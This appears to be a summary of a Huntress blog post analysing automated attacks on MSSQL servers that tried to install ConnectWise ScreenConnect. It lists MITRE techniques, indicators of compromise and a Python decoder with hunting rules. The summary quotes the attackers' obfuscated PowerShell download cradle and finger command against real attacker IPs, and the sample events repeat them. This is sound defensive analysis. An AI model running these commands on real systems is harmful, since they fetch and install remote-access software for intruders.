MSSQL to ScreenConnect | Huntress Blog

Huntress SOC analysts investigated alerts on endpoints running MSSQL Server and Fortinet EMS, uncovering automated attack sequences attempting to deploy a ConnectWise ScreenConnect client that ultimately failed. The investigation revealed encoded commands, PowerShell-driven download attempts, and MSI-based installation attempts across multiple endpoints, suggesting an automated playbook. #MSSQL #ScreenConnect #FortinetEMS #finger #ConnectWiseControl #PowerShell

Keypoints

  • Alerts on MSSQL Server/EMS endpoints prompted in-depth investigative timelines by Huntress.
  • The first indication was an MSSQL event ID 15281 indicating access to a stored procedure was blocked.
  • An xp_cmdshell-based sequence ran under sqlservr.exe, including a Windows command shell invocation.
  • Commands were encoded in decimal form and later decoded, with a decoded msiexec command referencing a temporary MSI file.
  • PowerShell-based download cradle attempted to fetch a ConnectWise ScreenConnect MSI from a remote host.
  • The attackers targeted a ScreenConnect installation but none appeared to succeed; a ScreenConnect instance ID and related IP were observed.
  • The activity across endpoints and customers suggests an automated playbook or scripted workflow.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The article frames initial access as exploitation of a public-facing MSSQL Server, noting: "The first indication of the attack was an MSSQL event ID 15281 record within the Application Event Log, indicating that access to a stored procedure was blocked."
  • [T1059.001] PowerShell – The attacker used a PowerShell-based download cradle: "powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest', 'c:\windows\temp\2.msi')"
  • [T1059.003] Windows Command Shell – The attack involved invoking Windows cmd.exe: "C:\Windows\system32\cmd.exe" /c FINGER [email protected][.]82[.]"
  • [T1218.007] Msiexec – MSI installation attempts are seen: "msiexec /q /i c:\windows\temp\1.msi"
  • [T1027] Command Obfuscation – The article describes "two commands encoded by converting each character to its decimal equivalent, separated by '+'."
  • [T1219] Remote Access Software – The operation culminates in attempts to install and connect a ScreenConnect/ConnectWise instance: "installer started and immediately stopped" and references to "ConnectWiseControl.ClientSetup.msi" on a remote host.
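The techniques above line up into a short chain (sqlservr.exe spawning a shell, decimal-encoded commands, a PowerShell download cradle, a quiet msiexec install from a temp path, and a finger client call). The following is an added example, not code from Huntress or from the blog post: a decoder for the '+'-separated decimal encoding the article describes, plus a handful of hunting rules run over constructed process-creation events. Hostnames, file paths and the 203.0.113.10 address in the sample events are constructed (the latter is a documentation range), not telemetry from the incident, and the rule names are this example's own.

```python
"""Decoder and hunting rules for the MSSQL -> ScreenConnect chain.

Added example, not Huntress code. Sample events, hosts and addresses are
constructed (203.0.113.0/24 is a documentation range), not incident data.
"""
import re
from dataclasses import dataclass

# A run of at least four 2-3 digit decimal values joined by '+', e.g. 109+115+105+101
DECIMAL_RUN = re.compile(r"(?<![\d+])\d{2,3}(?:\+\d{2,3}){3,}(?![\d+])")


def decode_decimal_plus(encoded: str) -> str:
    """Decode the '+'-separated decimal form from the post: 109+115+105 -> 'msi'."""
    return "".join(chr(int(n)) for n in encoded.split("+"))


def find_encoded_commands(text: str) -> list[tuple[str, str]]:
    """Return (encoded_run, decoded_text) for each run that decodes to printable ASCII."""
    found = []
    for match in DECIMAL_RUN.finditer(text):
        decoded = decode_decimal_plus(match.group(0))
        if all(32 <= ord(c) < 127 for c in decoded):
            found.append((match.group(0), decoded))
    return found


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR style)."""
    host: str
    parent_image: str
    image: str
    cmdline: str


def expand_cmdline(cmdline: str) -> str:
    """Append decoded payloads so the rules also see the plaintext command."""
    decoded = [d for _, d in find_encoded_commands(cmdline)]
    return cmdline + (" " + " ".join(decoded) if decoded else "")


def rule_sql_spawned_shell(e: ProcessEvent, text: str) -> bool:
    # xp_cmdshell shows up as sqlservr.exe directly parenting cmd.exe / powershell.exe
    return (e.parent_image.lower().endswith("sqlservr.exe")
            and e.image.lower().endswith(("cmd.exe", "powershell.exe")))


def rule_download_cradle(e: ProcessEvent, text: str) -> bool:
    t = text.lower()
    return "net.webclient" in t and ("invoke-expression" in t or re.search(r"\biex\b", t) is not None)


def rule_quiet_msi_from_temp(e: ProcessEvent, text: str) -> bool:
    t = text.lower()
    return "msiexec" in t and "/i" in t and "/q" in t and "\\temp\\" in t


def rule_finger_client(e: ProcessEvent, text: str) -> bool:
    # finger <user>@<host> is almost never legitimate on a database server
    t = text.lower()
    return "finger " in t and "@" in t


def rule_decimal_encoded(e: ProcessEvent, text: str) -> bool:
    return bool(find_encoded_commands(e.cmdline))


RULES = {
    "xp_cmdshell: sqlservr.exe spawned a shell": rule_sql_spawned_shell,
    "PowerShell download cradle": rule_download_cradle,
    "quiet msiexec install from a temp path": rule_quiet_msi_from_temp,
    "finger used as a client": rule_finger_client,
    "decimal '+'-encoded command": rule_decimal_encoded,
}


def hunt(events: list[ProcessEvent]) -> list[tuple[str, str]]:
    """Return (host, rule_name) for every rule that fires on every event."""
    findings = []
    for e in events:
        text = expand_cmdline(e.cmdline)
        for name, check in RULES.items():
            if check(e, text):
                findings.append((e.host, name))
    return findings


# Constructed sample telemetry modelled on the chain in the post (not real events).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_MSI = "+".join(str(ord(c)) for c in r"msiexec /q /i c:\windows\temp\1.msi")

SAMPLE_EVENTS = [
    ProcessEvent("SQL01", SQLSERVR, CMD, r'"C:\Windows\system32\cmd.exe" /c FINGER user@203.0.113.10'),
    ProcessEvent("SQL01", SQLSERVR, CMD, r"cmd.exe /c msiexec /q /i c:\windows\temp\1.msi"),
    ProcessEvent("SQL01", CMD, PS,
                 "powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; "
                 "Invoke-Expression (New-Object Net.WebClient).$ds.Invoke("
                 r"'http://203.0.113.10:23963/Bin/ConnectWiseControl.ClientSetup.msi', 'c:\windows\temp\2.msi')"),
    ProcessEvent("SQL01", SQLSERVR, CMD, "cmd.exe /c " + ENCODED_MSI),
    ProcessEvent("WEB02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Decoding before matching is the point of `expand_cmdline`: the encoded msiexec command in the fourth sample event would slip past a plain string match on the raw command line, but it is caught once the decimal run is turned back into text. The parent/child rule is the most durable of the five, since the method-name concatenation in the cradle can change freely while sqlservr.exe parenting cmd.exe cannot.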

Indicators of Compromise

  • [IP Address] context – 185.56.83.82, 95.179.241.10
  • [URL] context – http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest
  • [File name] context – 1.msi, m.msi, ConnectWiseControl.ClientSetup.msi
  • [Process/Executable] context – finger.exe, cmd.exe, powershell, msiexec.exe, sqlservr.exe

Read more: https://www.huntress.com/blog/mssql-to-screenconnect